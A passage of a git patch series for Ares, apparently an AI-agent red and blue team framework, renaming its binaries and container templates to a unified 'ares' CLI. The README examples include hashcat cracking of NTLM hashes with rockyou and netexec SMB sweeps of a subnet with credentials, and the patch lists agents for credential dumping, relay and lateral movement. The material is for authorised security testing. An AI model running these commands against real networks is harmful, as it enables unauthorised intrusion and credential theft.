-ARES_REDIS_URL=redis://localhost:16379 ares-cli blue from-operation --latest +ARES_REDIS_URL=redis://localhost:16379 ares blue from-operation --latest ``` ### Running Blue Alongside Red diff --git a/docs/grafana_mcp_usage.md b/docs/grafana_mcp_usage.md index ee839e75..a86a3e60 100644 --- a/docs/grafana_mcp_usage.md +++ b/docs/grafana_mcp_usage.md @@ -160,7 +160,7 @@ To use these capabilities: 1. Ensure the Grafana MCP server is configured and running 2. Set the `GRAFANA_URL` and `GRAFANA_SERVICE_ACCOUNT_TOKEN` environment variables -3. Start a blue team investigation: `ares-cli blue from-operation --latest` +3. Start a blue team investigation: `ares blue from-operation --latest` 4. Agents will automatically use Grafana tools during investigation For more information, see: diff --git a/docs/infrastructure.md b/docs/infrastructure.md index d09185b3..c1d4c8a1 100644 --- a/docs/infrastructure.md +++ b/docs/infrastructure.md @@ -56,12 +56,12 @@ ansible/ Ansible collection (dreadnode.nimbus_range v merge_list_dicts_into_list.py Data transformation utility warpgate-templates/ Container image build templates - ares-python-base/ Base: Kali + Ansible base role + security tools - ares-python-orchestrator/ Orchestrator: Rust binary + Redis client - ares-python-worker/ Generic worker (inherits ares-python-base) - ares-python-{recon,credential-access,cracker,acl,privesc,lateral-movement,coercion}-agent/ - ares-python-cracker-{agent-gpu,base-gpu}/ - ares-python-blue-{agent,triage-agent,threat-hunter-agent,lateral-analyst-agent}/ + ares-base/ Base: Kali + Ansible base role + security tools + ares-orchestrator/ Orchestrator: unified Ares binary + Redis client + ares-worker/ Generic worker (inherits ares-base) + ares-{recon,credential-access,cracker,acl,privesc,lateral-movement,coercion}-agent/ + ares-cracker-{agent-gpu,base-gpu}/ + ares-blue-{agent,triage-agent,threat-hunter-agent,lateral-analyst-agent}/ ares-golden-image/ All-in-one red team EC2 AMI (all tools) ``` @@ -93,7 +93,7 @@ nvidia/cuda:12.6.0-runtime-ubuntu24.04 └── ares-python-cracker-agent-gpu (+john, wordlists) debian:bookworm-slim - └── ares-python-orchestrator (Rust binary, no Ansible) + └── ares-orchestrator (unified `ares` binary, no Ansible) kalilinux/kali-rolling (AMI) └── ares-golden-image (all red team tools in one EC2 AMI) @@ -168,7 +168,7 @@ GPU templates (`ares-python-cracker-agent-gpu`, `ares-python-cracker-base-gpu`) The `tools.yaml` file at the repo root is the single source of truth for which binaries are expected per role. The build scripts -(`ares-worker/build.rs`, `ares-core/build.rs`) validate against it. +(`ares-cli/build.rs`, `ares-core/build.rs`) validate against it. 
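A build-time inventory check of the kind `tools.yaml` drives can be quite small. The sketch below is hypothetical: it assumes `serde_yaml` as a build dependency and a flat `tool → {binary, category, role}` mapping, which may not match the real schema consumed by the actual build scripts.

```rust
// build.rs sketch: warn at compile time when an expected binary is missing.
use std::{collections::BTreeMap, env, fs};

fn main() {
    println!("cargo:rerun-if-changed=../tools.yaml");
    let raw = fs::read_to_string("../tools.yaml").expect("read tools.yaml");
    let tools: BTreeMap<String, BTreeMap<String, String>> =
        serde_yaml::from_str(&raw).expect("parse tools.yaml");
    for (tool, meta) in &tools {
        let Some(bin) = meta.get("binary") else { continue };
        let on_path = env::var_os("PATH")
            .map(|paths| env::split_paths(&paths).any(|dir| dir.join(bin).exists()))
            .unwrap_or(false);
        if !on_path {
            // Warn instead of failing so cross-builds still succeed.
            println!("cargo:warning={tool}: `{bin}` not found on PATH");
        }
    }
}
```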
## Ansible Collection Details @@ -231,7 +231,8 @@ kubectl run ares-orchestrator \ --image=ghcr.io/dreadnode/ares-python-orchestrator:latest \ -it --rm \ --env="REDIS_URL=redis://redis:6379" \ - --env="ANTHROPIC_API_KEY=$ANTHROPIC_API_KEY" + --env="ANTHROPIC_API_KEY=$ANTHROPIC_API_KEY" \ + -- ares orchestrator # Worker deployment (long-running) kubectl create deployment ares-recon \ @@ -247,15 +248,18 @@ services: ports: ["6379:6379"] orchestrator: - image: ghcr.io/dreadnode/ares-python-orchestrator:latest + image: ghcr.io/dreadnode/ares-orchestrator:latest + command: ["ares", "orchestrator"] environment: REDIS_URL: redis://redis:6379 ANTHROPIC_API_KEY: ${ANTHROPIC_API_KEY} depends_on: [redis] recon-worker: - image: ghcr.io/dreadnode/ares-python-recon-agent:latest + image: ghcr.io/dreadnode/ares-recon-agent:latest + command: ["ares", "worker"] environment: REDIS_URL: redis://redis:6379 + ARES_WORKER_ROLE: recon depends_on: [redis] ``` diff --git a/docs/red.md b/docs/red.md index 4cf2d02e..36536cea 100644 --- a/docs/red.md +++ b/docs/red.md @@ -90,7 +90,7 @@ tool assignments. For detailed responsibilities, see sections below. - **Pod selectors**: `config/ares.yaml` - **Tool assignments**: `config/ares.yaml` → per-agent `capabilities` - **Max steps defaults**: `config/ares.yaml` → per-agent `max_steps` -- **Agent instructions**: `ares-orchestrator/src/` prompt templates +- **Agent instructions**: `ares-cli/src/orchestrator/` prompt templates ### Model Selection @@ -623,16 +623,16 @@ kubectl -n attack-simulation exec -it ares-recon-agent-0 -- \ **Core Components**: -- `ares-orchestrator/src/` - Main orchestrator coordination loop, task dispatch, LLM runner -- `ares-orchestrator/src/dispatcher/` - Task routing, throttling, and state management -- `ares-orchestrator/src/state/` - Operation state management -- `ares-orchestrator/src/config.rs` - Orchestrator configuration -- `ares-worker/src/` - Worker agent task loop, tool execution +- `ares-cli/src/orchestrator/` - Main orchestrator coordination loop, task dispatch, LLM runner +- `ares-cli/src/orchestrator/dispatcher/` - Task routing, throttling, and state management +- `ares-cli/src/orchestrator/state/` - Operation state management +- `ares-cli/src/orchestrator/config.rs` - Orchestrator configuration +- `ares-cli/src/worker/` - Worker agent task loop, tool execution - `ares-core/src/` - Shared models, state, Redis schema, telemetry **CLI**: -- `ares-cli/src/cli.rs` - CLI command definitions +- `ares-cli/src/cli/` - CLI command definitions - `ares-cli/src/ops/` - Red team operation commands - `ares-cli/src/blue/` - Blue team investigation commands - `ares-cli/src/transport.rs` - K8s/EC2 transport layer @@ -650,7 +650,7 @@ availability can vary by distro and role flags. 
All agents inherit these foundational tools: -- **Runtime**: Rust binaries (ares-worker), python3, pip3 +- **Runtime**: Rust binary (`ares worker`), python3, pip3 - **Utilities**: git, curl, wget, netcat-traditional, vim, jq, tmux, htop - **Network diagnostics**: dnsutils (dig, nslookup), net-tools, iproute2, tcpdump, telnet - **Debugging**: procps (ps, top), strace, lsof @@ -658,7 +658,7 @@ All agents inherit these foundational tools: ### Orchestrator Service Pod -- **Runtime**: Rust binary (ares-orchestrator) +- **Runtime**: Rust binary (`ares orchestrator`) - **Redis client**: For dispatcher and state management - **No pentesting tools**: Orchestrator only coordinates, never executes tools directly diff --git a/tools.yaml b/tools.yaml index 2766fc44..51c7d109 100644 --- a/tools.yaml +++ b/tools.yaml @@ -5,7 +5,7 @@ # Rust tool function names to their binary, category, and role. # # Two build scripts consume this file: -# - ares-worker/build.rs → tools_for_role() binary availability check +# - ares-cli/build.rs → tools_for_role() binary availability check # - ares-core/build.rs → tool_meta() telemetry/OTel span enrichment # # When Ansible provisioning changes, update THIS file — the generated From 22e3c2f5d2a731b06204618d13dc3e2780002498 Mon Sep 17 00:00:00 2001 From: Jayson Grace Date: Fri, 17 Apr 2026 10:47:13 -0600 Subject: [PATCH 04/10] docs: update references to Rust agent/orchestrator/worker binaries as `ares` CLI **Changed:** - Standardized documentation references for Rust agent/orchestrator/worker binaries to use the unified `ares` CLI syntax (e.g., `ares worker` or `ares orchestrator`) instead of legacy binary names like `ares-worker` or `ares-orchestrator` across all relevant README files - Updated example commands, directory structure listings, and descriptive sections to reflect the new CLI approach, improving clarity and consistency for users and aligning with current project naming conventions - Enhanced agent/orchestrator documentation tables to clarify invocation patterns with the new CLI format --- warpgate-templates/README.md | 86 +++++++++---------- .../templates/ares-acl-agent/README.md | 4 +- .../templates/ares-blue-agent/README.md | 38 ++++---- .../ares-blue-lateral-analyst-agent/README.md | 42 ++++----- .../ares-blue-threat-hunter-agent/README.md | 42 ++++----- .../ares-blue-triage-agent/README.md | 42 ++++----- .../templates/ares-cli/README.md | 10 +-- .../templates/ares-coercion-agent/README.md | 4 +- .../ares-cracker-agent-gpu/README.md | 47 +++++----- .../templates/ares-cracker-agent/README.md | 4 +- .../ares-credential-access-agent/README.md | 4 +- .../ares-lateral-movement-agent/README.md | 4 +- .../templates/ares-orchestrator/README.md | 60 ++++++------- .../templates/ares-privesc-agent/README.md | 4 +- .../templates/ares-recon-agent/README.md | 4 +- .../templates/ares-worker/README.md | 58 ++++++------- 16 files changed, 227 insertions(+), 226 deletions(-) diff --git a/warpgate-templates/README.md b/warpgate-templates/README.md index 75575719..f3a649fe 100644 --- a/warpgate-templates/README.md +++ b/warpgate-templates/README.md @@ -30,10 +30,10 @@ Templates support multi-architecture builds (amd64/arm64) where applicable and a go install github.com/CowDogMoo/warpgate/cmd/warpgate@latest # Build an Ares agent -warpgate build templates/ares-python-base/warpgate.yaml --arch amd64 +warpgate build templates/ares-base/warpgate.yaml --arch amd64 # Build and push to registry -warpgate build templates/ares-python-recon-agent/warpgate.yaml \ +warpgate build 
templates/ares-recon-agent/warpgate.yaml \ --arch amd64 \ --registry ghcr.io/dreadnode \ --push @@ -45,32 +45,32 @@ warpgate build templates/ares-python-recon-agent/warpgate.yaml \ | Template | Description | Base Image | Platforms | | -------- | ----------- | ---------- | --------- | -| [ares-python-base](./templates/ares-python-base) | Base Ares framework with Python and core dependencies | kalilinux/kali-rolling | Container (amd64, arm64) | -| [ares-python-orchestrator](./templates/ares-python-orchestrator) | Redis-based multi-agent coordinator | python:3.13.7-slim | Container (amd64, arm64) | -| [ares-python-worker](./templates/ares-python-worker) | Task polling agent for orchestration | ares-python-base | Container (amd64, arm64) | -| [ares-python-acl-agent](./templates/ares-python-acl-agent) | Active Directory ACL exploitation agent | ares-python-base | Container (amd64, arm64) | -| [ares-python-coercion-agent](./templates/ares-python-coercion-agent) | NTLM relay and authentication coercion tools | ares-python-base | Container (amd64, arm64) | -| [ares-python-cracker-agent](./templates/ares-python-cracker-agent) | Password cracking agent with hashcat and john | ares-python-base | Container (amd64, arm64) | -| [ares-python-credential-access-agent](./templates/ares-python-credential-access-agent) | Kerberos attacks and credential dumping tools | ares-python-base | Container (amd64, arm64) | -| [ares-python-lateral-movement-agent](./templates/ares-python-lateral-movement-agent) | Post-exploitation lateral movement tools | ares-python-base | Container (amd64, arm64) | -| [ares-python-privesc-agent](./templates/ares-python-privesc-agent) | Privilege escalation tools | ares-python-base | Container (amd64, arm64) | -| [ares-python-recon-agent](./templates/ares-python-recon-agent) | Network reconnaissance and AD enumeration tools | ares-python-base | Container (amd64, arm64) | +| [ares-base](./templates/ares-base) | Base Ares framework with Python and core dependencies | kalilinux/kali-rolling | Container (amd64, arm64) | +| [ares-orchestrator](./templates/ares-orchestrator) | Redis-based multi-agent coordinator (`ares orchestrator`) | python:3.13.7-slim | Container (amd64, arm64) | +| [ares-worker](./templates/ares-worker) | Task polling agent for orchestration (`ares worker`) | ares-base | Container (amd64, arm64) | +| [ares-acl-agent](./templates/ares-acl-agent) | Active Directory ACL exploitation agent | ares-base | Container (amd64, arm64) | +| [ares-coercion-agent](./templates/ares-coercion-agent) | NTLM relay and authentication coercion tools | ares-base | Container (amd64, arm64) | +| [ares-cracker-agent](./templates/ares-cracker-agent) | Password cracking agent with hashcat and john | ares-base | Container (amd64, arm64) | +| [ares-credential-access-agent](./templates/ares-credential-access-agent) | Kerberos attacks and credential dumping tools | ares-base | Container (amd64, arm64) | +| [ares-lateral-movement-agent](./templates/ares-lateral-movement-agent) | Post-exploitation lateral movement tools | ares-base | Container (amd64, arm64) | +| [ares-privesc-agent](./templates/ares-privesc-agent) | Privilege escalation tools | ares-base | Container (amd64, arm64) | +| [ares-recon-agent](./templates/ares-recon-agent) | Network reconnaissance and AD enumeration tools | ares-base | Container (amd64, arm64) | ### Ares Blue Team Templates | Template | Description | Base Image | Platforms | | -------- | ----------- | ---------- | --------- | -| 
[ares-python-blue-agent](./templates/ares-python-blue-agent) | Defensive security operations agent | ares-python-base | Container (amd64, arm64) | -| [ares-python-blue-triage-agent](./templates/ares-python-blue-triage-agent) | Initial incident assessment and alerting | ares-python-base | Container (amd64, arm64) | -| [ares-python-blue-threat-hunter-agent](./templates/ares-python-blue-threat-hunter-agent) | Proactive threat detection and investigation | ares-python-base | Container (amd64, arm64) | -| [ares-python-blue-lateral-analyst-agent](./templates/ares-python-blue-lateral-analyst-agent) | Lateral movement detection and analysis | ares-python-base | Container (amd64, arm64) | +| [ares-blue-agent](./templates/ares-blue-agent) | Defensive security operations agent | ares-base | Container (amd64, arm64) | +| [ares-blue-triage-agent](./templates/ares-blue-triage-agent) | Initial incident assessment and alerting | ares-base | Container (amd64, arm64) | +| [ares-blue-threat-hunter-agent](./templates/ares-blue-threat-hunter-agent) | Proactive threat detection and investigation | ares-base | Container (amd64, arm64) | +| [ares-blue-lateral-analyst-agent](./templates/ares-blue-lateral-analyst-agent) | Lateral movement detection and analysis | ares-base | Container (amd64, arm64) | ### GPU-Accelerated Cracking Templates | Template | Description | Base Image | Platforms | | -------- | ----------- | ---------- | --------- | -| [ares-python-cracker-base-gpu](./templates/ares-python-cracker-base-gpu) | Base image with CUDA/OpenCL GPU-accelerated hashcat | nvidia/cuda:12.6.0-runtime-ubuntu24.04 | Container (amd64) | -| [ares-python-cracker-agent-gpu](./templates/ares-python-cracker-agent-gpu) | Ares cracking agent with GPU-accelerated hashcat | ares-python-cracker-base-gpu | Container (amd64) | +| [ares-cracker-base-gpu](./templates/ares-cracker-base-gpu) | Base image with CUDA/OpenCL GPU-accelerated hashcat | nvidia/cuda:12.6.0-runtime-ubuntu24.04 | Container (amd64) | +| [ares-cracker-agent-gpu](./templates/ares-cracker-agent-gpu) | Ares cracking agent with GPU-accelerated hashcat | ares-cracker-base-gpu | Container (amd64) | ### Ray Cluster Templates @@ -146,23 +146,23 @@ warpgate build templates/ares-python-recon-agent/warpgate.yaml \ ```bash # Single architecture -warpgate build templates/ares-python-base/warpgate.yaml --arch amd64 +warpgate build templates/ares-base/warpgate.yaml --arch amd64 # Multi-architecture -warpgate build templates/ares-python-base/warpgate.yaml --arch amd64,arm64 +warpgate build templates/ares-base/warpgate.yaml --arch amd64,arm64 ``` #### Build Specialized Agents ```bash # Cracker agent for password recovery -warpgate build templates/ares-python-cracker-agent/warpgate.yaml \ +warpgate build templates/ares-cracker-agent/warpgate.yaml \ --arch amd64 \ --registry ghcr.io/dreadnode \ --push # Recon agent for network reconnaissance -warpgate build templates/ares-python-recon-agent/warpgate.yaml \ +warpgate build templates/ares-recon-agent/warpgate.yaml \ --arch amd64 \ --registry ghcr.io/dreadnode \ --push @@ -172,19 +172,19 @@ warpgate build templates/ares-python-recon-agent/warpgate.yaml \ ```bash # Run base agent -docker run -it ghcr.io/dreadnode/ares-python-base:latest bash +docker run -it ghcr.io/dreadnode/ares-base:latest bash # Run cracking workload -docker run -it ghcr.io/dreadnode/ares-python-cracker-agent:latest \ +docker run -it ghcr.io/dreadnode/ares-cracker-agent:latest \ hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt # Run reconnaissance scan 
-docker run -it ghcr.io/dreadnode/ares-python-recon-agent:latest \ +docker run -it ghcr.io/dreadnode/ares-recon-agent:latest \ netexec smb 192.168.1.0/24 -u user -p password # Orchestrate multiple agents for comprehensive assessment -docker run -d ghcr.io/dreadnode/ares-python-recon-agent:latest netexec smb 192.168.1.0/24 -docker run -d ghcr.io/dreadnode/ares-python-cracker-agent:latest hashcat -m 1000 hashes.txt +docker run -d ghcr.io/dreadnode/ares-recon-agent:latest netexec smb 192.168.1.0/24 +docker run -d ghcr.io/dreadnode/ares-cracker-agent:latest hashcat -m 1000 hashes.txt ``` ## Template Structure @@ -282,22 +282,22 @@ warpgate validate templates/your-template/warpgate.yaml ```text warpgate-templates/ ├── templates/ # All template definitions -│ ├── ares-python-base/ # Ares framework base image -│ ├── ares-python-orchestrator/ # Multi-agent coordinator -│ ├── ares-python-worker/ # Task polling agent -│ ├── ares-python-acl-agent/ # AD ACL exploitation -│ ├── ares-python-blue-agent/ # Blue team defensive agent -│ ├── ares-python-blue-lateral-analyst-agent/ # Lateral movement analysis -│ ├── ares-python-blue-threat-hunter-agent/ # Proactive threat hunting -│ ├── ares-python-blue-triage-agent/ # Incident triage -│ ├── ares-python-coercion-agent/ # NTLM relay tools -│ ├── ares-python-cracker-agent/ # Password cracking (CPU) -│ ├── ares-python-cracker-agent-gpu/ # Password cracking (GPU) -│ ├── ares-python-cracker-base-gpu/ # GPU hashcat base image -│ ├── ares-python-credential-access-agent/ # Kerberos attacks -│ ├── ares-python-lateral-movement-agent/ # Post-exploitation -│ ├── ares-python-privesc-agent/ # Privilege escalation -│ ├── ares-python-recon-agent/ # Network reconnaissance +│ ├── ares-base/ # Ares framework base image +│ ├── ares-orchestrator/ # Multi-agent coordinator +│ ├── ares-worker/ # Task polling agent +│ ├── ares-acl-agent/ # AD ACL exploitation +│ ├── ares-blue-agent/ # Blue team defensive agent +│ ├── ares-blue-lateral-analyst-agent/ # Lateral movement analysis +│ ├── ares-blue-threat-hunter-agent/ # Proactive threat hunting +│ ├── ares-blue-triage-agent/ # Incident triage +│ ├── ares-coercion-agent/ # NTLM relay tools +│ ├── ares-cracker-agent/ # Password cracking (CPU) +│ ├── ares-cracker-agent-gpu/ # Password cracking (GPU) +│ ├── ares-cracker-base-gpu/ # GPU hashcat base image +│ ├── ares-credential-access-agent/ # Kerberos attacks +│ ├── ares-lateral-movement-agent/ # Post-exploitation +│ ├── ares-privesc-agent/ # Privilege escalation +│ ├── ares-recon-agent/ # Network reconnaissance │ ├── crucible-challenge-core/ # FastAPI challenge base │ ├── crucible-challenge-torch/ # Challenge with PyTorch CPU │ ├── crucible-challenge-torch-gpu/ # Challenge with PyTorch GPU diff --git a/warpgate-templates/templates/ares-acl-agent/README.md b/warpgate-templates/templates/ares-acl-agent/README.md index 256f3344..f7dd8d68 100644 --- a/warpgate-templates/templates/ares-acl-agent/README.md +++ b/warpgate-templates/templates/ares-acl-agent/README.md @@ -102,14 +102,14 @@ warpgate validate ares-acl-agent - `ares_acl_tools` - bloodyAD, pywhisker - **Rust Binary:** - Compiled from `feature/rust-cli` branch with PyO3 Python bindings - - Installed to `/usr/local/bin/ares-worker` + - Installed to `/usr/local/bin/ares` - **Installed Tools:** - **bloodyAD** - Active Directory ACL exploitation framework - **pywhisker** - Shadow credentials manipulation tool - **Directory Structure:** - `/ares/` - Main Ares workspace directory - `/ares/.venv/` - Python virtual environment - - 
`/usr/local/bin/ares-worker` - Compiled worker binary + - `/usr/local/bin/ares` - Compiled Ares binary - The build includes cleanup steps to remove temporary files, Ansible artifacts, and Rust build artifacts. --- diff --git a/warpgate-templates/templates/ares-blue-agent/README.md b/warpgate-templates/templates/ares-blue-agent/README.md index 8ca35c8d..48159cbd 100644 --- a/warpgate-templates/templates/ares-blue-agent/README.md +++ b/warpgate-templates/templates/ares-blue-agent/README.md @@ -1,6 +1,6 @@ -# Ares Blue Agent Warp Gate Template +# Ares Rust Blue Agent Warp Gate Template -This template builds **Ares Blue Agent** images using Warp Gate. It supports +This template builds **Ares Rust Blue Agent** images using Warp Gate. It supports building **Docker images** (for `amd64` and `arm64`). The blue team agent performs defensive security operations using a compiled Rust binary with embedded Python. @@ -20,7 +20,7 @@ defensive security operations using a compiled Rust binary with embedded Python. The template configuration is managed in `warpgate.yaml`. Key settings include: -- `name`: Template name (`ares-blue-agent`) +- `name`: Template name (`ares-rust-blue-agent`) - `base.image`: Base Docker image (`ares-base`) - `sources`: Clones the ares repository for Rust compilation - `targets`: Defines build targets (container images) @@ -29,24 +29,24 @@ The template configuration is managed in `warpgate.yaml`. Key settings include: ## Building Docker Images -This builds **Ares Blue Agent** Docker images for `amd64` and `arm64` +This builds **Ares Rust Blue Agent** Docker images for `amd64` and `arm64` architectures, compiles the Rust worker binary with Python bindings, and configures it for defensive security operations. **Initialize the template:** ```bash -warpgate init ares-blue-agent +warpgate init ares-rust-blue-agent ``` **Build Docker images:** ```bash -warpgate build ares-blue-agent --only 'docker.*' +warpgate build ares-rust-blue-agent --only 'docker.*' ``` -After the build, Ares Blue Agent Docker images will be available -locally as `ares-blue-agent:latest`. +After the build, Ares Rust Blue Agent Docker images will be available +locally as `ares-rust-blue-agent:latest`. 
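Since these images build the binary with `--features python`, the PyO3 interop reduces to a feature gate. A minimal, hypothetical illustration of the pattern (not the actual ares code):

```rust
/// With the `python` feature, the binary embeds a Python interpreter via PyO3.
#[cfg(feature = "python")]
fn embedded_python_version() -> String {
    use pyo3::prelude::*;
    Python::with_gil(|py| py.version().to_string())
}

/// Without the feature, the same call degrades gracefully.
#[cfg(not(feature = "python"))]
fn embedded_python_version() -> String {
    "python feature disabled".to_string()
}
```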
--- @@ -59,10 +59,10 @@ After building the image, you can test it locally: docker run -it --rm \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ - ares-blue-agent:latest + ares-rust-blue-agent:latest # Verify the Rust binary is available -docker run --rm ares-blue-agent:latest ares-worker --version +docker run --rm ares-rust-blue-agent:latest ares worker --version ``` --- @@ -73,25 +73,25 @@ docker run --rm ares-blue-agent:latest ares-worker --version - Multi-arch (`amd64` + `arm64`) support - Default user: `root` - Working directory: `/root` - - Entrypoint: `ares-worker` (compiled Rust binary) + - Entrypoint: `ares worker` (compiled Rust binary) - **Installed Components:** - - Provided by `ares-python-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) - - Rust-compiled `ares-worker` binary with PyO3 Python bindings + - Provided by `ares-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) + - Rust-compiled `ares` binary with PyO3 Python bindings - **Build Process:** - Clones ares repository from `feature/rust-cli` branch - Compiles Rust binary with `--features python` for Python interop - - Installs binary to `/usr/local/bin/ares-worker` + - Installs binary to `/usr/local/bin/ares` - Cleans up build artifacts (source, compiler symlinks) --- ## Differences from ares-blue-agent (Python) -| Component | ares-blue-agent (Python) | ares-blue-agent | -| ---------- | ----------------------------------- | ------------------------------- | -| Entrypoint | `python -m ares --args.multi-agent` | `ares-worker` (binary) | -| Runtime | Python interpreter | Compiled Rust + embedded Python | -| Build | No compilation needed | Rust compilation with PyO3 | +| Component | ares-blue-agent (Python) | ares-rust-blue-agent | +| ----------- | ---------------------- | ------------------ | +| Entrypoint | `python -m ares --args.multi-agent` | `ares worker` (binary) | +| Runtime | Python interpreter | Compiled Rust + embedded Python | +| Build | No compilation needed | Rust compilation with PyO3 | --- diff --git a/warpgate-templates/templates/ares-blue-lateral-analyst-agent/README.md b/warpgate-templates/templates/ares-blue-lateral-analyst-agent/README.md index 00467f1e..256ee88e 100644 --- a/warpgate-templates/templates/ares-blue-lateral-analyst-agent/README.md +++ b/warpgate-templates/templates/ares-blue-lateral-analyst-agent/README.md @@ -1,6 +1,6 @@ -# Ares Blue Lateral Analyst Agent Warp Gate Template +# Ares Rust Blue Lateral Analyst Agent Warp Gate Template -This template builds **Ares Blue Lateral Analyst Agent** images using Warp Gate. It supports +This template builds **Ares Rust Blue Lateral Analyst Agent** images using Warp Gate. It supports building **Docker images** (for `amd64` and `arm64`). The lateral analyst agent detects and analyzes lateral movement using a compiled Rust binary with embedded Python and Grafana MCP integration. @@ -21,7 +21,7 @@ Grafana MCP integration. The template configuration is managed in `warpgate.yaml`. Key settings include: -- `name`: Template name (`ares-blue-lateral-analyst-agent`) +- `name`: Template name (`ares-rust-blue-lateral-analyst-agent`) - `base.image`: Base Docker image (`ares-base`) - `sources`: Clones the ares repository for Rust compilation - `targets`: Defines build targets (container images) @@ -30,24 +30,24 @@ The template configuration is managed in `warpgate.yaml`. 
Key settings include: ## Building Docker Images -This builds **Ares Blue Lateral Analyst Agent** Docker images for `amd64` and `arm64` +This builds **Ares Rust Blue Lateral Analyst Agent** Docker images for `amd64` and `arm64` architectures, installs Grafana MCP tooling, compiles the Rust worker binary with Python bindings, and configures it for lateral movement analysis. **Initialize the template:** ```bash -warpgate init ares-blue-lateral-analyst-agent +warpgate init ares-rust-blue-lateral-analyst-agent ``` **Build Docker images:** ```bash -warpgate build ares-blue-lateral-analyst-agent --only 'docker.*' +warpgate build ares-rust-blue-lateral-analyst-agent --only 'docker.*' ``` After the build, Docker images will be available locally as -`ares-blue-lateral-analyst-agent:latest`. +`ares-rust-blue-lateral-analyst-agent:latest`. --- @@ -60,18 +60,18 @@ After building the image, you can test it locally: docker run -it --rm \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ - ares-blue-lateral-analyst-agent:latest + ares-rust-blue-lateral-analyst-agent:latest # Verify installed components -docker run --rm ares-blue-lateral-analyst-agent:latest ares-worker --version -docker run --rm --entrypoint mcp-grafana ares-blue-lateral-analyst-agent:latest --version +docker run --rm ares-rust-blue-lateral-analyst-agent:latest ares worker --version +docker run --rm --entrypoint mcp-grafana ares-rust-blue-lateral-analyst-agent:latest --version ``` --- ## Installed Tools -- **ares-worker** - Rust-compiled worker binary with PyO3 Python bindings +- **ares** - Rust-compiled binary with PyO3 Python bindings - **mcp-grafana** - Grafana MCP server for observability integration - **Ares Python framework** - Agent orchestration and tool execution @@ -83,28 +83,28 @@ docker run --rm --entrypoint mcp-grafana ares-blue-lateral-analyst-agent:latest - Multi-arch (`amd64` + `arm64`) support - Default user: `root` - Working directory: `/root` - - Entrypoint: `ares-worker` (compiled Rust binary) + - Entrypoint: `ares worker` (compiled Rust binary) - **Installed Components:** - - Provided by `ares-python-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) - - Rust-compiled `ares-worker` binary with PyO3 Python bindings + - Provided by `ares-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) + - Rust-compiled `ares` binary with PyO3 Python bindings - `mcp-grafana` for Grafana observability integration - **Build Process:** - Installs `mcp-grafana` binary (architecture-specific) - Clones ares repository from `feature/rust-cli` branch - Compiles Rust binary with `--features python` for Python interop - - Installs binary to `/usr/local/bin/ares-worker` + - Installs binary to `/usr/local/bin/ares` - Cleans up build artifacts --- ## Differences from ares-blue-lateral-analyst-agent (Python) -| Component | Python | Rust | -| ----------- | ----------------------------------- | ------------------------------- | -| Entrypoint | `python -m ares --args.multi-agent` | `ares-worker` (binary) | -| Runtime | Python interpreter | Compiled Rust + embedded Python | -| Build | No compilation needed | Rust compilation with PyO3 | -| mcp-grafana | Included | Included | +| Component | Python | Rust | +| ----------- | ---------------------- | ------------------ | +| Entrypoint | `python -m ares --args.multi-agent` | `ares worker` (binary) | +| Runtime | Python interpreter | Compiled Rust + embedded Python | +| Build | No compilation needed | Rust compilation with PyO3 | +| mcp-grafana | Included 
| Included | --- diff --git a/warpgate-templates/templates/ares-blue-threat-hunter-agent/README.md b/warpgate-templates/templates/ares-blue-threat-hunter-agent/README.md index dc6fce51..7e12f53d 100644 --- a/warpgate-templates/templates/ares-blue-threat-hunter-agent/README.md +++ b/warpgate-templates/templates/ares-blue-threat-hunter-agent/README.md @@ -1,6 +1,6 @@ -# Ares Blue Threat Hunter Agent Warp Gate Template +# Ares Rust Blue Threat Hunter Agent Warp Gate Template -This template builds **Ares Blue Threat Hunter Agent** images using Warp Gate. It supports +This template builds **Ares Rust Blue Threat Hunter Agent** images using Warp Gate. It supports building **Docker images** (for `amd64` and `arm64`). The threat hunter agent performs proactive threat detection and investigation using a compiled Rust binary with embedded Python and Grafana MCP integration. @@ -21,7 +21,7 @@ Python and Grafana MCP integration. The template configuration is managed in `warpgate.yaml`. Key settings include: -- `name`: Template name (`ares-blue-threat-hunter-agent`) +- `name`: Template name (`ares-rust-blue-threat-hunter-agent`) - `base.image`: Base Docker image (`ares-base`) - `sources`: Clones the ares repository for Rust compilation - `targets`: Defines build targets (container images) @@ -30,24 +30,24 @@ The template configuration is managed in `warpgate.yaml`. Key settings include: ## Building Docker Images -This builds **Ares Blue Threat Hunter Agent** Docker images for `amd64` and `arm64` +This builds **Ares Rust Blue Threat Hunter Agent** Docker images for `amd64` and `arm64` architectures, installs Grafana MCP tooling, compiles the Rust worker binary with Python bindings, and configures it for threat hunting operations. **Initialize the template:** ```bash -warpgate init ares-blue-threat-hunter-agent +warpgate init ares-rust-blue-threat-hunter-agent ``` **Build Docker images:** ```bash -warpgate build ares-blue-threat-hunter-agent --only 'docker.*' +warpgate build ares-rust-blue-threat-hunter-agent --only 'docker.*' ``` After the build, Docker images will be available locally as -`ares-blue-threat-hunter-agent:latest`. +`ares-rust-blue-threat-hunter-agent:latest`. 
--- @@ -60,18 +60,18 @@ After building the image, you can test it locally: docker run -it --rm \ -e REDIS_URL="redis://localhost:6379" \ -e ANTHROPIC_API_KEY="your-api-key" \ - ares-blue-threat-hunter-agent:latest + ares-rust-blue-threat-hunter-agent:latest # Verify installed components -docker run --rm ares-blue-threat-hunter-agent:latest ares-worker --version -docker run --rm --entrypoint mcp-grafana ares-blue-threat-hunter-agent:latest --version +docker run --rm ares-rust-blue-threat-hunter-agent:latest ares worker --version +docker run --rm --entrypoint mcp-grafana ares-rust-blue-threat-hunter-agent:latest --version ``` --- ## Installed Tools -- **ares-worker** - Rust-compiled worker binary with PyO3 Python bindings +- **ares** - Rust-compiled binary with PyO3 Python bindings - **mcp-grafana** - Grafana MCP server for observability integration - **Ares Python framework** - Agent orchestration and tool execution @@ -83,28 +83,28 @@ docker run --rm --entrypoint mcp-grafana ares-blue-threat-hunter-agent:latest -- - Multi-arch (`amd64` + `arm64`) support - Default user: `root` - Working directory: `/root` - - Entrypoint: `ares-worker` (compiled Rust binary) + - Entrypoint: `ares worker` (compiled Rust binary) - **Installed Components:** - - Provided by `ares-python-base` (Python 3.13.x, uv, Ares framework, dependencies, procps) - - Rust-compiled `ares-worker` binary with PyO3 Python bindings + - Provided 